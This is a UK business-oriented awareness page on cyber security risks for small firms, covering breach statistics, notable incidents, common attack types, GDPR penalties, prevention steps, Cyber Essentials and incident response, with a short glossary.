Why should businesses worry?
40% of businesses in the UK reported a cyber security breach from 2019-2020.
Cyber security breaches cost UK businesses an average of £3,320 from 2019-2020.
Attacks can hinder a business's productivity, harm its reputation and cause it to lose its competitive edge.
Recent cyber attacks
The personal details of 9 million customers were accessed after EasyJet faced a cyber attack in May 2020, with 2,200 customer credit card details stolen by the hackers.
Hotel group Marriott was fined £100m in July 2019 after hackers stole the records of 339 million guests, including credit card details, passport number and dates of birth.
Currency service provider Travelex were forced to take its systems offline for almost a month after a ransomware attacked the firm’s website on New Year's Eve 2019, demanding the sum of £4.6m.
SMEs can underestimate the threat of cyber attacks and often don't believe they're at risk:
65% of SMEs suffered a cyber attack from 2019-20 compared to 46% of all businesses on average
24% of senior managers are updated less than once a year on cyber security
18% of SME decision makers list cyber security as their least concern.
Small and micro businesses lack the resources or knowledge to defend against an attack:
81% do not receive any training on cyber security.
68% have no formal policies for ensuring cyber security.
26% have no cyber security measures at all.
94% of malware is now delivered by email. This is what a common cyber attack now looks like:
An email is sent disguised as an invoice or bill.
The subject lines of emails containing malware often include words such as 'invoice', 'document' or 'order'.
The user is tricked into downloading an attachment.
The file triggers the installation of malicious software.
When the file is launched, it prompts the user to execute a macro or launches PowerShell to download and execute the final payload.
The user's device is typically infected with ransomware, which encrypts the user's private data.
Here are some tactics used to exploit cyber security vulnerabilities:
Dupes users into supplying sensitive information by posing as a trustworthy source, such as a bank, commonly used retailer or a personal acquaintance.
37% of the cyber crimes affecting SMEs were spear phishing attacks.
Compromises legitimate websites by injecting malicious code to visitors passing by when they download the infected software.
29% of cyber crimes affecting SMEs were malware attacks.
Extorts victims for money or private information in exchange for the decryption of data and removal of malware.
Ransomware attacks have increased 195% during the first half of 2019
Distributed Denial of Service attack
Attempts to flood a network to disrupt the service and prevent users from accessing it.
16% of SMEs have suffered a DDoS attack.
Cyber attacks are highly lucrative with profits easily made on the black market from selling stolen goods.
Here are estimates of the black market value of some commonly stolen credentials:
Ready-made toolkits for attacks are also available for budding criminals with little technical knowledge required to run attacks on their own:
An attack can damage a business’s financial health directly, and the recovery process can be lengthy and costly. It’s estimated that it costs the small business community £4.5 billion annually.
Attacks resulting in a data breach and exposure of customers’ confidential information negatively impact customers’ views of the business:
Criminals may steal your employees' or customers' personal details and as it's your responsibility to safeguard this data it can be constituted as a breach of the Data Protection Act (DPA) and General Data Protection Regulation (GDPR).
This could result in compensation to individuals who suffered damage from the breach or severe penalties from the ICO (Information Commissioner's Office) where you can be fined up to 20 million euros (or equivalent in sterling).
EU General Data Protection Regulations (GDPR) came into effect as of May 2018 and still apply to the UK.
Businesses must be able to prove that any data they hold is protected or face the risk of hefty fines.
As many as 9,000 Tesco Bank customers lost money from their accounts, following a data breach in November 2016.
£2.5 million was stolen from customer accounts in total.
Customers had up to £600 withdrawn from their accounts.
Tesco would face fines of over £1.9 billion if it occurred under the EU's GDPR.
Educating employees on how to protect sensitive data using security best-practices is crucial to safeguarding your business.
It’s recommended that you consult a network security specialist to give a thorough assessment on protecting your company. Here are some steps you can take right now:
Encourage employees to use strong passwords, refrain from using the same password for multiple logins and change passwords every 90 days.
Always Install the latest security updates for software and web applications which will Close known vulnerabilities.
Encrypt sensitive data such as employee details and financial accounts.
Update your anti-virus software and firewall as soon as a new version is released to ensure they’re effective against new forms of malware.
Create "whitelists" that control all traffic through the network by granting access to certain IPs and e-mail addresses.
- Cyber Essentials is a scheme backed and supported by the UK Government to help protect businesses of all sizes against common cyber threats.
- Businesses can attain a Cyber Essentials badge to advertise the fact that they are following government endorsed standards for cyber security. To obtain the badge, businesses can carry out a self-assessment to see if they meet the requirements, or they can be independently assessed by accrediting bodies.
- The scheme outlines five main procedures that should be implemented for basic protection against cyber attacks:
Unfortunately cyber attacks may succeed despite taking preventative measures.
Having a plan in place in the event of a successful attack can limit damage. Safeguarding data should be a priority, especially if that data is crucial to the running of your business:
4 in 10 SMEs say they would struggle to recover from data loss.
1 in 4 SMEs admit they wouldn't be able to recover any data.
Logging and monitoring any suspicious activity can inform you as soon as a breach happens, giving you a chance to respond quickly and limit potential damage. This can be done in-house or outsourced to specialists.
Regularly backing up your data means it can be accessed easily to reduce downtime in the event of a breach. However, there is a risk that you may restore the same vulnerabilities which caused the breach in the first place so you should consult a specialist beforehand on how to mitigate this.
Consulting a security specialist for a thorough risk assessment and further advice is essential. You can also:
Have procedures in place which identify and isolate infected systems to prevent further infection.
Establish an incident response team trained with the skills and expertise to address threats.
If your customer database has been compromised, those customers should be directly informed of the breach and advice should be given on what actions they should take, such as changing passwords and checking bank statements.
A framework by Microsoft for automating batch processes and performing configuration management and administrative tasks.
A type of malicious program that prevents victims from accessing their information and private files by encrypting them and demanding a some of money to return the original unencrypted files.
Android banking trojan
A type of malicious program that disguises itself as legitimate application, affecting the android operating system on mobile devices. The android banking trojan is primarily used to steal and gain access to private information and finances.
Allow only administrator-approved programs and users to gain system access, blocking anything that has not been approved.
A company with under 250 employees and an annual turnover under £50 million.
A company with 10 or fewer employees and a turnover of less than €2million. Also known as a micro entity.